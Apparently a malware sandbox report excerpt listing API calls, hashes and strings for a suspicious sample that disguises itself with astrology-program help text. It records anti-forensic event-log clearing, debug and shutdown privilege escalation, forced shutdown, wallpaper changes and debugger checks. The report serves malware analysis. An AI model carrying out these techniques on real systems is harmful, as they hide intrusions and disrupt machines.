                                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3435690185-3733053543
                                          • Opcode ID: 3250dcac45bdcafb37807497172bb2e84b2591ca3618f8bbb045365a2d31ccca
                                          • Instruction ID: 9efd02268b03e8f7ba71efd93f35dadaf9a9b0aa69baeb9de79fb3bd7f2ba333
                                          • Opcode Fuzzy Hash: 3250dcac45bdcafb37807497172bb2e84b2591ca3618f8bbb045365a2d31ccca
                                          • Instruction Fuzzy Hash: 3511AB73A00208DFDB10EFB4DC49FAE7778DB48B10F400959F905DB284DA71AA55C790
                                          APIs
                                          • ReleaseMutex.KERNEL32(00000000,6C4485EC,6C4485F0,00000000,6C3D1BD0,6C46DAA0,6C46DA60,?,6C351356), ref: 6C3C8D16
                                          • WriteProfileStringA.KERNEL32(Desktop,TileWallpaper,6C403018), ref: 6C3C8D61
                                          • WriteProfileStringA.KERNEL32(Desktop,WallpaperStyle,6C4030C8), ref: 6C3C8DA8
                                          • SystemParametersInfoA.USER32(00000014,00000000,00000003), ref: 6C3C8DB6
                                            • Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C86C1
                                            • Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C86C9
                                            • Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C870C
                                            • Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C874E
                                            • Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C8789
                                            • Part of subcall function 6C3C86B7: _fputc.LIBCMT ref: 6C3C87C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fputc$ProfileStringWrite$InfoMutexParametersReleaseSystem
                                          • String ID: Desktop$TileWallpaper$WallpaperStyle
                                          • API String ID: 2760925735-2776484331
                                          • Opcode ID: 4ca5592edad727c9ef66a43acc6d4f5da7404c73213e6c9840a82354274653ab
                                          • Instruction ID: 9da3cb0c203713ebf43aa8052db23e857bb08442b25402016bfaf0225263f7f0
                                          • Opcode Fuzzy Hash: 4ca5592edad727c9ef66a43acc6d4f5da7404c73213e6c9840a82354274653ab
                                          • Instruction Fuzzy Hash: 9531D9347461416ADF10FB299C44EADA639E79271CB64C027E950CBE44C722CE469F67
                                          APIs
                                          • OpenEventLogW.ADVAPI32(00000000,03DB65EC), ref: 03D960A7
                                          • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 03D960B2
                                          • CloseEventLog.ADVAPI32(00000000), ref: 03D960B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$ClearCloseOpen
                                          • String ID: Application$Security$System
                                          • API String ID: 1391105993-2169399579
                                          • Opcode ID: d09301c763e5c0772c11930f14332e2747c2616ffa70e85cf1e56a5e72d57c6a
                                          • Instruction ID: 65e58ca36dd08d48a2f6cf58a19cea51cfab4d4a0f3a7ec0906624fd5a5e8355
                                          • Opcode Fuzzy Hash: d09301c763e5c0772c11930f14332e2747c2616ffa70e85cf1e56a5e72d57c6a
                                          • Instruction Fuzzy Hash: B1E0ED73605210CBD221EB15A88875AF3E0FBC8716F040A1EE94D93308C630C8228B9A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3bf0000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: swprintf$_memset
                                          • String ID: :$@
                                          • API String ID: 1292703666-1367939426
                                          • Opcode ID: dfe623fccbc4960a75ec84bb90a095736d32cf22afdac25adabc4b4dc478b11c
                                          • Instruction ID: 0a64379289b08645aeea860ad7ac6395966ab4d8c6c3c131727ee84d78711a13
                                          • Opcode Fuzzy Hash: dfe623fccbc4960a75ec84bb90a095736d32cf22afdac25adabc4b4dc478b11c
                                          • Instruction Fuzzy Hash: E0315DB6D0021C9BDB14CFE5CC95BEEB7B9EB48300F518219EA1AAB241EA745945CB90
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,03DA957A,?,03D9D1B4,?,000000BC,?,00000001,00000000,00000000), ref: 03DA8F7C
                                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,03DA957A,?,03D9D1B4,?,000000BC,?,00000001,00000000,00000000), ref: 03DA8FA5
                                          • GetACP.KERNEL32(?,?,03DA957A,?,03D9D1B4,?,000000BC,?,00000001,00000000), ref: 03DA8FB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: dcfa296981b76b1e55ca20a2e55c0d2955c5c425df9462ec224ce8e76a31becf
                                          • Instruction ID: 98e1a9d24fa674320dbccfc04ae43cca2e767297761c8770503b5553fdd9e8c2
                                          • Opcode Fuzzy Hash: dcfa296981b76b1e55ca20a2e55c0d2955c5c425df9462ec224ce8e76a31becf
                                          • Instruction Fuzzy Hash: 2C012831205B07FEEB11DA69EE05B9E7EA9AB00758F144454F901E0080EB60C641D250
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6C3EFEA5,?,6C3DFB61,?,000000BC,?), ref: 6C3EF87B
                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6C3EFEA5,?,6C3DFB61,?,000000BC,?), ref: 6C3EF8A4
                                          • GetACP.KERNEL32(?,?,6C3EFEA5,?,6C3DFB61,?,000000BC,?), ref: 6C3EF8B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 42d42421e74f6792faa5ca4878eb765be051e297cf08d517e94a4e4e95e5c30b
                                          • Instruction ID: 55f60ff08b986a0af61a589f43b9ba93b32c8ac751519c017bd3c52230b61ccd
                                          • Opcode Fuzzy Hash: 42d42421e74f6792faa5ca4878eb765be051e297cf08d517e94a4e4e95e5c30b
                                          • Instruction Fuzzy Hash: 1701243170521BBAEB21CB51F909FCA33BC9F0D35CF204566E505E0880EBA1D6418F51
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,03D88DFC), ref: 03D88C56
                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,03D88DFC,?,?,?,?,?,?,74DF0630), ref: 03D88C5D
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 03D88C85
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 03D88CB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2349140579-2896544425
                                          • Opcode ID: 85a88cbcf8fda8b01833f461f117eb5f6cc98b5bae11c1743194b20697ed33e0
                                          • Instruction ID: cd4d97f179675c6bd98586888f832b3e39490b8aa561cfb94851e524ac384467
                                          • Opcode Fuzzy Hash: 85a88cbcf8fda8b01833f461f117eb5f6cc98b5bae11c1743194b20697ed33e0
                                          • Instruction Fuzzy Hash: 71112572E40208EBDF14EFE4D849FEEB7B4EB48B00F104559F506AB284EA74A555CB50
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 03D9FEBD
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03D9FED2
                                          • UnhandledExceptionFilter.KERNEL32(03DB2F70), ref: 03D9FEDD
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 03D9FEF9
                                          • TerminateProcess.KERNEL32(00000000), ref: 03D9FF00
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 930ab83d268af72edc7729f0a593ac727c1ee03b368d56515a4c2cd090a93d08
                                          • Instruction ID: 3127e25e52fa1d34b1815579f97168ebbd92b8736124ab69441c08e76e3febcf
                                          • Opcode Fuzzy Hash: 930ab83d268af72edc7729f0a593ac727c1ee03b368d56515a4c2cd090a93d08
                                          • Instruction Fuzzy Hash: 3B21DFB7931307DFDB14FF29E485A483BA4BB08350F10481BE6898B359EBB09598DF55
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 02F07A4D
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F07A62
                                          • UnhandledExceptionFilter.KERNEL32(02F15330), ref: 02F07A6D
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 02F07A89
                                          • TerminateProcess.KERNEL32(00000000), ref: 02F07A90
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 29ba7484ef3357e66a9ba10f9696275654ecb4dbec0719366a897dd24180541d
                                          • Instruction ID: 7b02a7f3f33be64020ac6ce086ec64d71d5e0bc1fa43fb5a936b78ec2a5a8be4
                                          • Opcode Fuzzy Hash: 29ba7484ef3357e66a9ba10f9696275654ecb4dbec0719366a897dd24180541d
                                          • Instruction Fuzzy Hash: E12100B4D9224CDFE302DF69F159628FBB1BB083D4FC21859E50897240EBB498A0CF00
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 6C3D5EF7
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C3D5F0C
                                          • UnhandledExceptionFilter.KERNEL32(6C3FFF84), ref: 6C3D5F17
                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6C3D5F33
                                          • TerminateProcess.KERNEL32(00000000), ref: 6C3D5F3A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                          • String ID:
                                          • API String ID: 2579439406-0
                                          • Opcode ID: 1211e4e01e283594b52559e8ff324e5f546600b659c0609db550ede0be54857c
                                          • Instruction ID: b6e845b9f4303571179e7c327cd7a44dd7031f927ef3d19db8a08a8c55cfc6c4
                                          • Opcode Fuzzy Hash: 1211e4e01e283594b52559e8ff324e5f546600b659c0609db550ede0be54857c
                                          • Instruction Fuzzy Hash: F72103B9B122A48FCF52FF98D5486447BB4FB0A308F10441AE90893740E7B69A85CFA5
                                          APIs
                                            • Part of subcall function 03D89070: GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
                                            • Part of subcall function 03D89070: OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
                                            • Part of subcall function 03D89070: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
                                            • Part of subcall function 03D89070: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
                                            • Part of subcall function 03D89070: GetLastError.KERNEL32 ref: 03D890D2
                                            • Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890E0
                                          • ExitWindowsEx.USER32(00000005,00000000), ref: 03D96151
                                            • Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890FB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                          • String ID:
                                          • API String ID: 681424410-0
                                          • Opcode ID: aee6a1a41078fba264dec1dbcbe4cbebf93fa5b1e2e3813499e0f02e63af0ed6
                                          • Instruction ID: 6724146c70f173f02afc9649f95906285a7fbd19bb04daa92d45e78771e2129d
                                          • Opcode Fuzzy Hash: aee6a1a41078fba264dec1dbcbe4cbebf93fa5b1e2e3813499e0f02e63af0ed6
                                          • Instruction Fuzzy Hash: 64C08C7734030062D224B3B47822779B320DB88732F60062FF74BCC1C00D6364A081B5
                                          APIs
                                            • Part of subcall function 03D89070: GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
                                            • Part of subcall function 03D89070: OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
                                            • Part of subcall function 03D89070: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
                                            • Part of subcall function 03D89070: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
                                            • Part of subcall function 03D89070: GetLastError.KERNEL32 ref: 03D890D2
                                            • Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890E0
                                          • ExitWindowsEx.USER32(00000006,00000000), ref: 03D9612D
                                            • Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890FB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                          • String ID:
                                          • API String ID: 681424410-0
                                          • Opcode ID: 1afccfdc28d810ee3dfea2c9bd6dd0eec72ed18afa2ba67c8025d3dd38744b39
                                          • Instruction ID: 54bc25b06c41635e16197ba26f03dc806fa707974b8300b5a4346b1530318012
                                          • Opcode Fuzzy Hash: 1afccfdc28d810ee3dfea2c9bd6dd0eec72ed18afa2ba67c8025d3dd38744b39
                                          • Instruction Fuzzy Hash: D6C08C7734030062D224B3B47822779B320DB88732F60062BF64BCC1C00D6364B081B5
                                          APIs
                                            • Part of subcall function 03D89070: GetCurrentProcess.KERNEL32(00000028,?), ref: 03D89089
                                            • Part of subcall function 03D89070: OpenProcessToken.ADVAPI32(00000000), ref: 03D89090
                                            • Part of subcall function 03D89070: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 03D890B6
                                            • Part of subcall function 03D89070: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 03D890CC
                                            • Part of subcall function 03D89070: GetLastError.KERNEL32 ref: 03D890D2
                                            • Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890E0
                                          • ExitWindowsEx.USER32(00000004,00000000), ref: 03D96109
                                            • Part of subcall function 03D89070: CloseHandle.KERNEL32(?), ref: 03D890FB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                          • String ID:
                                          • API String ID: 681424410-0
                                          • Opcode ID: 0871b717c0e2424bcb1e658838a902b73b004de59abf88371fa97b8dd6f0d5a8
                                          • Instruction ID: 6c97cf65f97de731ad4c5eb67a5c501bf37a66bd4d19c65a44a24e8dfc17c772
                                          • Opcode Fuzzy Hash: 0871b717c0e2424bcb1e658838a902b73b004de59abf88371fa97b8dd6f0d5a8
                                          • Instruction Fuzzy Hash: 41C04CB774030466D224B7B57826779B360DB98732F60066BF74BDC1C05D6764A481B9
                                          APIs
                                          • EnumSystemLocalesA.KERNEL32(Function_0009F931), ref: 6C3EFCDF
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2099609381-0
                                          • Opcode ID: 37a97cd17b47e8cc66b54c26ad5e12337976762c8232d301f831ab38a71a4888
                                          • Instruction ID: ee91526e937212463ed736d8739f480c60f1269f12b56dd492ef40b6ac1f0aa7
                                          • Opcode Fuzzy Hash: 37a97cd17b47e8cc66b54c26ad5e12337976762c8232d301f831ab38a71a4888
                                          • Instruction Fuzzy Hash: 6DD05E7090535087C7249F22D448305BBE07F0A74AFA88A4CCA9D16541C2BEA546CB80
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: 504cbaa90e4fd8a6cd86d26f79a8d4847f6587c53892dcaa57282db86be3f51a
                                          • Instruction ID: 021329485c6a8e3986dad1e6c3edd900418ee715865889ea286ff778f79df07a
                                          • Opcode Fuzzy Hash: 504cbaa90e4fd8a6cd86d26f79a8d4847f6587c53892dcaa57282db86be3f51a
                                          • Instruction Fuzzy Hash: 34C08CB5DC22C88EE301DFA4B608305BFA263843D9FE25888D22E89141CB380020CF04
                                          APIs
                                          • _sprintf.LIBCMT ref: 6C35CC56
                                          • _sprintf.LIBCMT ref: 6C35CCD0
                                            • Part of subcall function 6C3D1F84: __output_l.LIBCMT ref: 6C3D1FDF
                                          Strings
                                          • _a[jonOPACDm]: Sort aspects by power, orb, orb difference, 1st planet,, xrefs: 6C35CDA8
                                          • _o <file> [..]: Write parameters of current chart to file., xrefs: 6C35D0DC
                                          • _zl <long> <lat>: Change the default longitude & latitude., xrefs: 6C35D014
                                          • _e: Print all charts together (_v_w_g_a_m_Z_S_l_j_7_L_K_Zd_d_D_B_E)., xrefs: 6C35CF06
                                          • _Nz [<rows>]: Display all time changes in time zone of chart city., xrefs: 6C35CFCE
                                          • _Ky: Like _K but display a calendar for the entire year., xrefs: 6C35CE5C
                                          • _rb <file1> <file2>: Display biorhythm for file1 at time file2., xrefs: 6C35D3AC
                                          • _b: Use ephemeris files for more accurate location computations., xrefs: 6C35D1E0
                                          • _1 [<objnum>]: Cast chart with specified object on Ascendant., xrefs: 6C35D2EE
                                          • _m: Display all object midpoints in sorted zodiac order., xrefs: 6C35CDBC
                                          • _r <file1> <file2>: Compute a relationship synastry chart., xrefs: 6C35D37A
                                          • _rd <file1> <file2>: Print time span between files' dates., xrefs: 6C35D3A2
                                          • _HC: Display names of zodiac signs and houses., xrefs: 6C35CC77
                                          • _rc <file1> <file2>: Compute a composite chart., xrefs: 6C35D384
                                          • _q <month> <date> <year> <time>: Compute chart with defaults., xrefs: 6C35D06E
                                          • _HF, xrefs: 6C35CCC2
                                          • _Q: Prompt for more command switches after display finished., xrefs: 6C35CCE0
                                          • _R [<obj1> [<obj2> ..]]: Restrict specific bodies from displays., xrefs: 6C35D10E
                                          • _qj <day>: Compute chart for time of specified Julian day., xrefs: 6C35D0BE
                                          • _N [<rows>]: Lookup chart location as city in atlas., xrefs: 6C35CFBA
                                          • _i[2,3,4] <file>: Load chart info into chart slots 2, 3, or 4., xrefs: 6C35D0D2
                                          • _qd <month> <date> <year>: Compute chart for noon on date., xrefs: 6C35D078
                                          • Switches which affect how a chart is computed:, xrefs: 6C35D1D6
                                          • _3: Display objects in their zodiac decan positions., xrefs: 6C35D302
                                          • _H: Display this help list., xrefs: 6C35CC63
                                          • %s (version %s) command switches:, xrefs: 6C35CC50
                                          • _bU: Use inaccurate Matrix formulas for fixed stars only., xrefs: 6C35D212
                                          • _zN <city>: Lookup city in atlas and set zone, Daylight, and location., xrefs: 6C35D064
                                          • _Z: Display planet locations with respect to the local horizon., xrefs: 6C35CDDA
                                          • _z [<zone>]: Change the default time zone (for _d_E_t_q options)., xrefs: 6C35D000
                                          • _dp[y]n: Search for progressed aspects in current month/year., xrefs: 6C35CEAC
                                          • _i <file>: Compute chart based on info in file., xrefs: 6C35D0C8
                                          • _Ap: Orb limits apply to latitude as well as zodiac position., xrefs: 6C35D19A
                                          • 2nd planet, aspect, 1st position, 2nd position, midpoint., xrefs: 6C35CDB2
                                          • _T <month> <day> <year>: Display transits ordered by influence., xrefs: 6C35CF56
                                          • _w0 [..]: Like _w but reverse order of objects in houses 4..9., xrefs: 6C35CD44
                                          • _V[d,y,Y] [[<day>] <month>] <year>: Like _V for day, year, or 5 years., xrefs: 6C35CF88
                                          • _V[..]0: Like _V but don't restrict fast moving objects from graph., xrefs: 6C35CF92
                                          • _HF: Display names of astronomical constellations., xrefs: 6C35CC95
                                          • _HI: Display meanings of signs, houses, planets, and aspects., xrefs: 6C35CCB3
